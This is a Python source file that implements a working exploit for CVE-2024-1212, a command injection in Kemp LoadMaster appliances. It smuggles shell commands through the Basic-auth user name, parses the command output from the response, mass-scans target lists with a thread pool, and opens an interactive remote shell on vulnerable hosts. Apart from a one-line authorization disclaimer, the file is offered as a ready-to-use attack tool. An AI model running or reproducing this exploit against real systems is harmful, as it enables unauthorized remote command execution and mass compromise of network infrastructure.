"""Command-line client for CVE-2024-1212 (command injection in Kemp LoadMaster).

The script either checks a single target given with ``-u`` and, if the check
succeeds, opens an interactive prompt, or checks every URL listed in a file
given with ``-f`` using a thread pool.

Use only against systems you are explicitly authorized to test.
"""
import argparse
import os
import re
import warnings
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Optional

import requests
from alive_progress import alive_bar
from prompt_toolkit import HTML, PromptSession
from prompt_toolkit.history import InMemoryHistory
from rich.console import Console
from rich.markup import escape

# Requests below are sent with verify=False; silence the warning urllib3
# would otherwise emit for each of them.
warnings.filterwarnings(
    "ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning
)


class LoadMaster:
    """CLI driver: constructing an instance prints the banner and runs the CLI.

    Attributes are documented inline in ``__init__``.
    """

    # Text between the "[S]" and "[E]" markers that send_command() wraps
    # around the command; DOTALL so multi-line output is captured.
    _OUTPUT_PATTERN = re.compile(r"\[S\](.*?)\[E\]", re.DOTALL)
    # A line ending in ';', '&&' or '||' (optionally followed by whitespace).
    _CHAIN_SUFFIX = re.compile(r"(;|&&|\|\|)\s*$")

    def __init__(self):
        self.console = Console()
        # Path given with -o; positive results are appended to it.
        self.output_file: Optional[str] = None
        # Set to True in single-target mode so negative results are printed.
        self.verbose = False
        # Target given with -u; stays None in file-scan mode.
        self.url: Optional[str] = None
        self.print_ascii()
        self.parse_arguments()

    def print_ascii(self) -> None:
        """Print the banner, one ``custom_print`` call per row, framed by blank lines."""
        # NOTE(review): the interior spacing of these rows looks collapsed in
        # this copy of the file; restore from upstream if alignment matters.
        ascii_art = [
            "┌────────────────────────────────────────────────────────────────────────────────────────────┐",
            "│ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██████╗ ██╗██████╗ │",
            "│██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║╚════██╗███║╚════██╗│",
            "│██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║ █████╔╝╚██║ █████╔╝│",
            "│██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║██╔═══╝ ██║██╔═══╝ │",
            "│╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║███████╗ ██║███████╗│",
            "│ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝╚══════╝│",
            "└────────────────────────────────────────────────────────────────────────────────────────────┘",
        ]
        print()
        for line in ascii_art:
            self.custom_print(f"[bright_green]{line}[/bright_green]", "+")
        print()

    def parse_arguments(self) -> None:
        """Parse ``sys.argv`` and dispatch to single-target or file-scan mode.

        With ``-u`` the target is checked and, on success, the interactive
        prompt is started. With ``-f`` every URL in the file is checked using
        ``-t`` worker threads (default 50). With neither, help is printed.
        """
        parser = argparse.ArgumentParser(
            description="CVE-2024-1212 Command Injection Exploit for Kemp LoadMaster."
        )
        parser.add_argument("-u", "--url", help="Target URL for command injection.")
        parser.add_argument("-f", "--file", help="File containing target URLs to scan")
        parser.add_argument("-o", "--output", help="Output file for saving scan results")
        parser.add_argument(
            "-t",
            "--threads",
            default=50,
            type=int,
            help="Number of threads to use for scanning",
        )
        args = parser.parse_args()
        self.output_file = args.output

        if args.url:
            self.verbose = True
            self.url = args.url
            if self.check_vulnerability(args.url):
                self.interactive_shell(args.url)
        elif args.file:
            self.scan_from_file(args.file, args.threads)
        else:
            parser.print_help()

    def send_command(self, command: str, url: str) -> Optional[str]:
        """Send ``command`` to ``url`` and return its captured output.

        The command is wrapped between ``echo '[S]'`` and ``echo '[E]'`` and
        passed as the user name of the request's ``auth`` tuple.

        Returns:
            The stripped text found between the markers in the response body,
            or ``None`` if the request failed or no markers were found.
        """
        command_payload = f"';echo '[S]';{command};echo '[E]';'"
        try:
            response = requests.get(
                url + "/access/set?param=enableapi&value=1",
                auth=(command_payload, "anything"),
                verify=False,
                timeout=20,
            )
        except requests.RequestException:
            return None
        return self.parse_command_output(response.text)

    def parse_command_output(self, response_text: str) -> Optional[str]:
        """Return the stripped text between ``[S]`` and ``[E]``, or ``None`` if absent."""
        match = self._OUTPUT_PATTERN.search(response_text)
        if match is None:
            return None
        return match.group(1).strip()

    def check_vulnerability(self, url: str) -> bool:
        """Run ``hostname`` on ``url`` and report whether any output came back.

        On success a result row is printed and, if an output file is set, the
        URL is appended to it. On failure a message is printed only in verbose
        mode.

        Returns:
            ``True`` if the command returned non-empty output, else ``False``.
        """
        hostname = self.send_command("hostname", url)
        if not hostname:
            if self.verbose:
                self.custom_print(
                    f"System at {escape(url)} is not vulnerable, or the command produced no output.",
                    "-",
                )
            return False

        # Both values are untrusted (user input / remote output) and the
        # message is rendered with rich markup enabled, so escape them.
        # Padding is applied first so the escaping does not alter the width.
        url_cell = escape(f"{url:^30}")
        host_cell = escape(f"{hostname:^30}")
        self.custom_print(f"Vulnerable | {url_cell} | CVE-2024-1212 | {host_cell}", "+")

        if self.output_file:
            with open(self.output_file, "a", encoding="utf-8") as file:
                file.write(f"{url}\n")
        return True

    def scan_from_file(self, target_file: str, threads: int) -> None:
        """Check every non-blank line of ``target_file`` as a URL, in parallel.

        Args:
            target_file: Path to a text file with one URL per line.
            threads: Maximum number of worker threads.
        """
        if not os.path.exists(target_file):
            self.custom_print(f"File not found: {escape(target_file)}", "-")
            return

        with open(target_file, "r", encoding="utf-8") as file:
            urls = [line.strip() for line in file if line.strip()]

        if not urls:
            self.custom_print("No URLs found in the file.", "-")
            return

        with alive_bar(
            len(urls), title="Scanning Targets", bar="smooth", enrich_print=False
        ) as bar:
            with ThreadPoolExecutor(max_workers=threads) as executor:
                futures = [
                    executor.submit(self.check_vulnerability, url) for url in urls
                ]
                # Results are reported by check_vulnerability itself; here we
                # only advance the progress bar as each check finishes.
                for _ in as_completed(futures):
                    bar()

    def split_commands(self, cmd_input: str) -> List[str]:
        """Split multi-line input into individual commands.

        Blank lines are skipped. Each remaining line is stripped and becomes
        its own command, except that a line ending in ``;``, ``&&`` or ``||``
        is concatenated (without a separator) with the following line(s).
        """
        commands = []
        buffer = ""
        for line in cmd_input.splitlines():
            stripped = line.strip()
            if not stripped:
                continue
            buffer += stripped
            if self._CHAIN_SUFFIX.search(stripped):
                # Trailing chaining operator: wait for the next line.
                continue
            commands.append(buffer)
            buffer = ""
        if buffer:
            # Input ended on a chaining operator; emit what was collected.
            commands.append(buffer)
        return commands

    def interactive_shell(self, url: str) -> None:
        """Read commands from a prompt and print each one's output.

        ``exit`` leaves the loop and ``clear`` clears the console. Ctrl-C and
        Ctrl-D also leave the loop.
        """
        session = PromptSession(history=InMemoryHistory(), multiline=False)
        self.custom_print(
            "Interactive shell is ready. Type your commands. Use 'exit' to quit.", "!"
        )
        while True:
            try:
                cmd_input = session.prompt(HTML("# "))
                keyword = cmd_input.strip().lower()
                if keyword == "exit":
                    break
                if keyword == "clear":
                    self.console.clear()
                    continue
                for command in self.split_commands(cmd_input):
                    result = self.send_command(command, url)
                    print(result if result else "No output.", "\n")
            except (KeyboardInterrupt, EOFError):
                # prompt_toolkit raises EOFError on Ctrl-D; treat it like Ctrl-C.
                break

    def custom_print(self, message: str, header: str) -> None:
        """Print ``message`` prefixed by ``[header]`` in that header's colour.

        ``message`` is rendered with rich markup, so callers must escape any
        untrusted text they interpolate into it. Unknown headers use white.
        """
        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
        color = header_colors.get(header, "white")
        self.console.print(f"[bold {color}][{header}][/bold {color}] {message}")


if __name__ == "__main__":
    LoadMaster()